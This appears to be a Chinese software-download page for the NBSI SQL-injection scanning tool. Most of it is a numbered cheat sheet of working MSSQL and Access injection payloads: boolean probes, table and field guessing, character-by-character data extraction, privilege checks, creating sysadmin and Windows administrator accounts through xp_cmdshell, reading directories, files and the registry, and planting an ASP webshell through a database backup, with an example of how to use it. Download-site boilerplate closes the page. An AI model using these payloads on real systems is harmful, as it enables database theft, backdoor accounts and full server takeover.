NBSI注入网站漏洞扫描专用工具是一款功能齐全的APP,由vb语言撰写的网站漏洞检测专用工具的名字,ASP注入网站漏洞扫描专用工具,尤其在sql server注入检验层面有较高的准确度。
1.分辨是不是有注入
;and 1=1
;and 1=2
2.分析判断是不是mssql
;and user0
3.分辨数据库系统软件
;and (select count(*) from sysobjects)0 mssql
;and (select count(*) from msysobjects)0 Access
4.注入主要参数是标识符
and [查询条件] and =
5.检索时没过虑主要参数的
and [查询条件] and %=
6.猜数据库
;and (Select Count(*) from [数据库名])0
7.猜字段
;and (Select Count(字段名) from 数据库名)0
8.猜字段中纪录长短
;and (select top 1 len(字段名) from 数据库名)0
9.(1)猜字段的ASCII值(access)
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)0
(2)猜字段的ascii值(mssql)
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)0
10.检测管理权限构造(mssql)
;and 1=(SELECT IS_SRVROLEMEMBER(sysadmin));--
;and 1=(SELECT IS_SRVROLEMEMBER(serveradmin));--
;and 1=(SELECT IS_SRVROLEMEMBER(setupadmin));--
;and 1=(SELECT IS_SRVROLEMEMBER(securityadmin));--
;and 1=(SELECT IS_SRVROLEMEMBER(diskadmin));--
;and 1=(SELECT IS_SRVROLEMEMBER(bulkadmin));--
;and 1=(SELECT IS_MEMBER(db_owner));--
11.加上mssql和体系的账号
;exec master.dbo.sp_addlogin username;--
;exec master.dbo.sp_password null,
username,password;--
;exec master.dbo.sp_addsrvrolemember sysadmin
username;--
;exec master.dbo.xp_cmdshell net user username
password /workstations:* /TIMes:all
/passwordchg:yes /passwordreq:yes /active:yes /add
;--
;exec master.dbo.xp_cmdshell net user username
password /add;--
;exec master.dbo.xp_cmdshell net localgroup
administrators username /add;--
12.(1)解析xml文件目录
;create table dirs(paths varchar(100), id int)
;insert dirs exec master.dbo.xp_dirtree c:\
;and (select top 1 paths from dirs)0
;and (select top 1 paths from dirs where paths not
in(上步获得的paths)))
(2)解析xml文件目录
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
;insert temp exec master.dbo.xp_availablemedia;-- 得到当今全部控制器
;insert into temp(id) exec master.dbo.xp_subdirs c:\;-- 得到根目录目录
;insert into temp(id,num1) exec master.dbo.xp_dirtree c:\;-- 得到全部根目录的文件目录树形结构
;insert into temp(id) exec master.dbo.xp_cmdshell type c:\web\index.asp;-- 查询文档的內容
13.mssql中的sql语句
xp_regenumvalues 注册表文件根键, 子键
;exec xp_regenumvalues HKEY_LOCAL_MACHINE,
SOFTWARE\Microsoft\windows\CurrentVersion\Run 以好几个记录集方法回到全部键值
xp_regread 根键,子键,键值名
;exec xp_regread HKEY_LOCAL_MACHINE,
SOFTWARE\Microsoft\Windows\CurrentVersion,
CommonFilesDir 回到制订键的值
xp_regwrite 根键,子键, 值名, 值种类, 值
值种类有2种REG_SZ 表明字符型,REG_DWORD 表明整形
;exec xp_regwrite HKEY_LOCAL_MACHINE,
SOFTWARE\Microsoft\Windows\CurrentVersion,
TestValueName,reg_sz,hello 载入注册表文件
xp_regdeletevalue 根键,子键,值名
exec xp_regdeletevalue HKEY_LOCAL_MACHINE,
SOFTWARE\Microsoft\Windows\CurrentVersion,
TestValueName 删掉某一值
xp_regdeletekey HKEY_LOCAL_MACHINE,
SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey 退格键,包含该键下全部值
14.mssql的backup建立webshell
use model
create table cmd(str image);
insert into cmd(str) values (% Dim oScript %);
backup database model to disk=c:\l.asp;
15.mssql内嵌函数公式
;and (select @@version)0 得到Windows的版本信息
;and user_name()=dbo 分辨当今系统软件的联接客户是否sa
;and (select user_name())0 爆当今系统软件的联接客户
;and (select db_name())0 获得当今联接的数据库
16.简约的webshell
use model
create table cmd(str image);
insert into cmd(str) values (%=server.createobject(wscript.shell).exec(cmd.exe /c request(c)).stdout.readall%);
backup database model to disk=g:\wwwtest\l.asp;
要求的情况下,像这样子用:
http://ip/l.asp?c=dir
密码:
相关攻略
相关专题
多特软件专题为您提供数据库软件,免费数据库软件,数据库软件排行;安卓苹果版软件app一应俱全。多特软件站只提供绿色、无毒、无插件、无木马的纯绿色工具下载
多特软件专题为您提供漏洞检测,服务器漏洞检测,app漏洞检测工具;安卓苹果版软件app一应俱全。多特软件站只提供绿色、无毒、无插件、无木马的纯绿色工具下载
漏洞扫描工具的主要功能是通过开发对本地计算机进行扫描,通过漏洞扫描工具评估计算机的健康状况,分析计算机中是否存在安全漏洞。在许多情况下,我们在漏洞扫描过程中使用漏洞扫描工具,通过系统不断更新和修复漏洞,提高计算机安全性。下面的版本为您整理了一些漏洞扫描工具。有需要的朋友可以下载并使用它们。多特软件专题为您提供漏洞扫描工具,公司漏洞扫描工具,安卓漏洞扫描工具。多特软件站只提供绿色、无毒、无插件、无木马的纯绿色软件下载。
多特手游专题为您提供梦幻手游刷金币漏洞,梦幻手游转移100万金币。安卓苹果版一应俱全,找经典手游就来多特手机游戏频道下载!
多特软件专题为您提供数据库工具,数据库查询工具,数据库连接工具;安卓苹果版软件app一应俱全。多特软件站只提供绿色、无毒、无插件、无木马的纯绿色工具下载
同类排行
最近更新
